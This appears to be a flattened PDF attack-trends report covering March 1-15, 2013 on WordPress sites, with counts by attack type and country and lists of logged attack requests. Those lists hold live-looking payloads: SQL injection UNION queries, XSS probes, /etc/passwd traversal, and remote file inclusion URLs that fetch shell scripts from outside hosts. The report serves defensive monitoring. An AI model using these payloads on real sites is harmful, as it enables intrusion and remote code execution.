Attack Trends March 1-15, 2013 Attack Type Remote File Inclusion SQLi WordPress Username Deduction Directory Traversal/Local File Inclusion XSS File Upload Attempt by Non-Admin Detected Possible XML-RPC Attacks WordPress Trackback Potential [PHP] code execution attacks PHP/CGI Source Code Disclosure/Code Execution Times Seen 3867 1985 1119 711 410 361 356 156 28 14 Attacking Countries United States Ukraine Russian Federation China Germany Canada Romania France Sweden Hong Kong Switzerland Netherlands Japan Poland United Kingdom Czech Republic Nigeria Israel Brazil Turkey Taiwan Europe Venezuela Norway Spain Korea, Republic of Italy Belarus Luxembourg Indonesia Mexico Australia Lithuania Thailand Kazakhstan Kenya Belgium Denmark Vietnam Chile United Arab Emirates Malaysia Madagascar Singapore South Africa Yemen Anonymous Proxy India Iran, Islamic Republic of Austria El Salvador Serbia Dominican Republic Lebanon Moldova, Republic of Colombia Estonia Jamaica Iraq Ghana Guatemala Times Seen 6737 450 302 281 169 164 112 109 108 77 61 58 38 35 34 29 24 23 22 21 20 19 18 18 17 14 14 11 8 7 6 5 5 5 5 4 4 4 4 3 3 3 3 2 2 2 2 2 2 2 2 1 1 1 1 1 1 1 1 1 1 Attacked Plugins /wp-content/plugins/mm-forms-community/includes/doajaxfileupload.php /wp-content/plugins/radykal-fancy-gallery/admin/image-upload.php /wp-content/plugins/vslider/timthumb.php?src=http%3A%2F%2Fradiopro.ro%2F551081_481072245272916_1741626627_n-300x200.jpg&w=600&h=300&zc=1&q=80 /wp-content/plugins/contact-form-7/images/id.flv??? 
/wp-content/plugins/vslider/timthumb.php?src=http%3A%2F%2Fradiopro.ro%2Fradiopro.jpg&w=600&h=300&zc=1&q=80 /wp-content/plugins/jetpack/m /wp-content/plugins/sniplets/view/sniplets/inset.php?text= /wp-content/plugins/sniplets/view/admin/submenu.php?url="> /wp-content/plugins/wp-audio-gallery-playlist/playlist.php?post_gallery=-1'+UNION+ALL+SELECT+1,2,3,4,5,database(),current_user(),8,9,10,11,12,13,14,15,16,17,18,version(),20,21,22,23-/wp-content/plugins/wp-cumulus/tagcloud.swf?mode=tags&tagcloud=Click me /wp-content/plugins/sniplets/view/sniplets/warning.php?text= /wp-content/plugins/tune-library/tune-library-ajax.php?letter=-1'+UNION+ALL+SELECT+CONCAT_WS(CHAR(59),version(),current_user(),database()),2-/wp-content/plugins/facebook-opengraph-meta-plugin/all_meta.php?pst_title=1')+UNION+ALL+SELECT+CONCAT_WS(CHAR(44),version(),current_user(),database()),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23-- &page=100&rows=1 /wp-content/plugins/foxypress/foxypress-affiliate.php?aff_id="><script>alert(43875062308456)</script> /wp-content/plugins/nextgen-gallery/xml/media-rss.php?mode= /wp-content/plugins/accept-signups/accept-signups_submit.php?email=clshack<script>alert(43875062308456)</script> /wp-content/plugins/ajax-category-dropdown/includes/dhat-ajax-cat-dropdown-request.php?admin&category_id="> /wp-content/plugins/couponer/print-coupon.php?ID=-1'+UNION+ALL+SELECT+1,version(),database(),current_user(),5,6,7,8,9,10-/wp-content/plugins/pica-photo-gallery/picadownload.php?imgname=../../../../../../../etc/passwd /wp-content/plugins/search-autocomplete/includes/tags.php?term=-1'+UNION+ALL+SELECT+CONCAT_WS(CHAR(44),version(),current_user(),database()),2,3,4-/wp-content/plugins/sniplets/view/admin/pager.php?page="> /wp-content/plugins/oqey-gallery/getimages.php?gal_id=0'+UNION+ALL+SELECT+1,2,3,4,5,6,7,CONCAT_WS(CHAR(95),version(),current_user(),database()),9,10%23 /wp-content/plugins/photoracer/changefrom.php?rid="><script>alert(43875062308456)</script> 
/wp-content/plugins/photoracer/changeto.php?rid="><script>alert(43875062308456)</script> Times Seen 167 8 5 4 3 3 3 3 3 2 2 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 Attacked Themes /wp-content/themes/onepagewebsite/uploads/upload.php /wp-content/themes/deep-blue/images/upload/&fileext=php /wp-content/themes/nuance/functions/jwpanel/scripts/valums_uploader/php.php /wp-content/themes/Avenue/cache/lobo.txt?? /wp-content/themes/folioway/timthumb.php?src=http%3A%2F%2Fpicasa.com.beerdunce.com%2Fbad.php /wp-content/themes/hulk/scripts/timthumb.php?src=http%3A%2F%2Fpicasa.com.bristel.co.uk%2Fsimple.php /wp-content/themes/Attack-Scanner-Theme/admin/upload-file.php /wp-content/themes/hulk/scripts/timthumb.php?src=http%3A%2F%2Fpicasa.com.xenophobiawatch.co.za%2Fsimple.php /wp-content/themes/hulk/scripts/timthumb.php?src=http%3A%2F%2Fblogger.com.etres60.com.mx%2Fbad.php /wp-content/themes/blacklabel/framework/timthumb_old.php?src=http://picasa.com.sigem.ci/cok.php /wp-content/themes/cubed_v1.2/functions/timthumb.php?src=http%3A%2F%2Fflickr.com.howigotoutofdebt.com%2Fbad.php /wp-content/themes/clockstone/theme/functions/upload.php /wp-content/themes/folioway/core/thumb.php?src=http%3A%2F%2Fimg.youtube.com.marcomdistributie.ro%2Fbad.php /wp-content/themes/twentyeleven/wp-admin/'"--> /wp-content/themes/twentyeleven/wp-admin/?nsextt='"--> /wp-content/themes/folioway/core/thumb.php?src=http://wordpress.com.fb.bbdginc.com/jos.php /wp-content/themes/twentyeleven/wp-admin/?'"--></style></script><script>netsparker(0x000A59)</script> /wp-content/themes/twentyeleven/wp-admin/?hTTp://netsparker.com/n /wp-content/themes/twentyeleven/wp-admin/?http://www.netsparker.com? /wp-content/themes/wp-admin/?http://www.netsparker.com? 
/wp-content/themes/wp-admin/?nsextt='"--> /wp-content/themes/wp-admin/'"--> /wp-content/themes/twentyten/style.css /wp-content/themes/wp-admin/?'"--></style></script><script>netsparker(0x000A18)</script> /wp-content/themes/wp-admin/?hTTp://netsparker.com/n /wp-content/themes/koi/themify/img_x.php?src=http://picasa.com.kidsworldprintables.com/result/bat.php /wp-content/themes/themorningafter/timthumb.php?src=http%3A%2F%2Fwordpress.com.fb.bbdginc.com%2Fjack.php /wp-content/themes/?src=http%3A%2F%2Fwordpress.com.fb.bbdginc.com%2Fjos.php /wp-content/themes/'"--> /wp-content/themes/flashnews/timthumb.php?src=http%3A%2F%2Fflickr.com.coolrentals.ro/tim.php /wp-content/themes/twentyeleven/js/'"--> /wp-content/themes/twentyeleven/js/html5.js'"--> /wp-content/themes/twentyeleven/style.css'"--> /wp-content/themes/twentyeleven/'"--> /wp-content/themes/twentyeleven/colors/'"--> /wp-content/themes/twentyeleven/colors/dark.css'"--> Times Seen 55 48 10 8 7 6 4 3 3 3 3 2 2 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 Page 1 Remote File Inclusion SQLi WordPress Username Deduction Directory Traversal/Local File Inclusion XSS File Upload Attempt by Non-Admin Detected Possible XML-RPC Attacks WordPress Trackback Potential [PHP] code execution attacks PHP/CGI Source Code Disclosure/Code Execution Page 2 Attack Trends March 1-15, 2013 Upload Directories Searched /wp-content/uploads/2012/08/FB-RW-Cover2.jpg&w=960&h=300&zc=1 /wp-content/uploads/2010/08/rfihttp://sibkukla.ru/1/bb.jpg??? /wp-content/uploads/2010/08/rfihttp://www.comfaoriente.com//a/ipays.jpg? /wp-content/uploads/2010/08/dorks.txthttp://www.xfocus.net/tools/200608/r57.txt? /wp-content/uploads/2010/08/*.php?mosConfig_absolute_path=http://flickr.com.meuviciodesdeoinicio.com.br/bot.txt?? /wp-content/uploads/2012/08/FB-RW-Cover1.jpg&w=960&h=300&zc=1 /wp-content/uploads/2010/08/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://sibkukla.ru/1/bb.jpg??? 
/wp-content/uploads/2010/08/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.comfaoriente.com//a/ipays.jpg? /wp-content/uploads/2012/08/Slide-KellyCattle.jpg&w=960&h=400&zc=1 /wp-content/uploads/2010/08/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.travel-orzelbialy.zam.pl/galeria/include/copyright.txt?? /wp-content/uploads/2010/08/bbs_sun/skin/zero_vote/error.php?dir=http://flickr.com.annohelpt.nl/css.php?? /wp-content/uploads/2012/08/Slide-CattleMountain2.jpg&w=960&h=400&zc=1 /wp-content/uploads/2012/08/Slide-FeedingCalf.jpg&w=960&h=400&zc=1 /wp-content/uploads/2010/08/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.wushu.org.ge/e107_images/david.txt /wp-content/zipndownload.php?PP_PATH=http://www.psychvisit.com/id1.txt? /wp-content/uploads/2010/08/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://picasa.com.radioalasnaciones.com/id.txt? /wp-content/uploads/zipndownload.php?PP_PATH=http://www.psychvisit.com/id1.txt? /wp-content/uploads/2012/08/Slide-RopingCalf1.jpg&w=960&h=400&zc=1 /wp-content/uploads/2010/rfihttp://www.comfaoriente.com//a/ipays.jpg? /wp-content/uploads/2010/08/zipndownload.php?PP_PATH=http://www.psychvisit.com/id1.txt? /wp-content/uploads/2010/rfihttp://sibkukla.ru/1/bb.jpg??? /wp-content/uploads/2010/08/index.php?go=http://www.travel-orzelbialy.zam.pl/galeria/include/copyright.txt?? /wp-content/uploads/2010/08/index.php?pag=http://www.khzshilat.ir/img/icons/bonze.jpg?? /wp-content/uploads/2010/zipndownload.php?PP_PATH=http://www.psychvisit.com/id1.txt? /wp-content/uploads/2010/08//components/com_smf/smf.php?mosConfig_absolute_path=http://heritagevirtualairline.net/bonze.jpg?? /wp-content/uploads/2010/08//main.php?page=http://www.travel-orzelbialy.zam.pl/galeria/include/pbot.txt?? /wp-content/uploads/2010/08//modules/vwar/admin/admin.php?vwar_root=http://www.sweet-affiliates.com/no-more-acne//config/bot.txt?? 
/wp-content/uploads/2012/08/Slide-Branding.jpg&w=960&h=400&zc=1 /wp-content/uploads/2010//orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://octo.beev.no/e107_public/byroe.jpg?? /wp-content/wp-admin/?http://www.netsparker.com? /wp-content/uploads/2010/08//accounts/inc/include.php?language=0&lang_settings[0][1]=http://blogger.com.ippi.cl/force2.php? /wp-content/uploads/2010/08//appserv/main.php?appserv_root=http://blogger.com.ippi.cl/force2.php? /wp-content/uploads/2010/08//config/config_admin.php?INC=http://87.201.203.154/HTouch/kickstart/images/shawls/bonze.jpg?? /wp-content/uploads/2010/index.php?body=http://www.psychvisit.com/id1.txt? /wp-content/uploads/2010/08/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.dubion.com/english/awmdata/menu/pop.jpg?? /wp-content/uploads/2010/08//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.picasa.com.sanalespri.com/b0t.php?? /wp-content/uploads/2012/'"--> /wp-content/uploads/2010/08//components/com_smf/smf.php?mosConfig_absolute_path=http://heritagevirtualairline.net/international.txt?? /wp-content/wp-admin/?hTTp://netsparker.com/n /wp-content/wp-admin/?'"--></style></script><script>netsparker(0x000A12)</script> /wp-content/uploads/'"--> /wp-content/wp-admin/'"--> /wp-content/wp-admin/?nsextt='"--> /wp-content/uploads/2012/10/'"--> /wp-content/uploads/2010//index.php?load=http://bmwtours.com/flight/include/id.txt???? /wp-content/uploads/2010//orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://octo.beev.no/e107_public/allnet.jpg?? /wp-content/uploads/2010//accounts/inc/include.php?language=0&lang_settings[0][1]=http://blogger.com.ippi.cl/force2.php? /wp-content/uploads/index.php?body=http://www.psychvisit.com/id1.txt? /wp-content/uploads/2012/11/'"--> /wp-content/uploads/2010/08//index.php?load=http://professionaldiving.ru/e107_files/public/avatars/data/pic82.jpg?? 
/wp-content/uploads/2010/08//main.php?page=http://www.wushu.org.ge/e107_images/david.txt /wp-content/uploads/2010/08//includes/orderSuccess.inc.php?glob=http://bmwtours.com/flight/include/id.txt???? /wp-content/uploads/2010/08/dorks.txt" h=http://troyanos.eshost.es/plugins/system/scan.txt? /wp-content/uploads/2010/08/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.dubion.com/english/awmdata/menu/rock.jpg?? /wp-content/uploads/2010/08/agendax/addevent.inc.php?agendax_path=http://www.printom.ru/netcat/modules/my_captcha/img/fee4181443c7299d710d3036451418e4? /wp-content/uploads/2010/08//orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://octo.beev.no/e107_public/byroe.jpg?? /wp-content/uploads/2010/08//orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://octo.beev.no/e107_public/allnet.jpg?? /wp-content/uploads/2010/08/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://picasa.com.radioalasnaciones.com/load.txt??? /wp-content/uploads/2010/08//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.dubion.com/english/awmdata/menu/mad01.jpg?? /wp-content/uploads/2010/08//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.dubion.com/english/awmdata/menu/mad02.jpg?? /wp-content/uploads/2010/08/index.php?pag=http://www.khzshilat.ir/img/common/gov-trac.txt?? /wp-content/uploads/2010/08/index.php?go=http://www.wushu.org.ge/e107_images/david.txt /wp-content/uploads/2010/08//config/config_admin.php?INC=http://apamagis.com.br/admconta/n.txt?? /wp-content/uploads/2010/08//config/config_admin.php?INC=http://www.printom.ru/netcat/modules/my_captcha/img/fee4181443c7299d710d3036451418e4? /wp-content/uploads/2010/08//header.php?abspath=http://picasa.com.blackwellbusiness.com//bot.txt?? /wp-content/uploads/2010/08//index.php?load=http://professionaldiving.ru/e107_files/public/avatars/data/foto81.jpg?? /wp-content/uploads/2010/08/dorks.txt=http://www.avidsen.com/2009/danger.txt?? 
/wp-content/uploads/2010/08/dorks.txt" h=http://www.alub.com.br/concursos/concursos/recursos/cmd.txt?&&r=s& /wp-content/uploads/2010/08//index.php?load=http://bmwtours.com/flight/include/id.txt???? /wp-content/uploads/2010/08/index.php?body=http://www.psychvisit.com/id1.txt? /wp-content/uploads/2010/08/impex/ImpExData.php?systempath=http://www.printom.ru/netcat/modules/my_captcha/img/fee4181443c7299d710d3036451418e4? Page 3 Times Seen 10 6 6 5 5 4 4 4 4 4 3 3 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1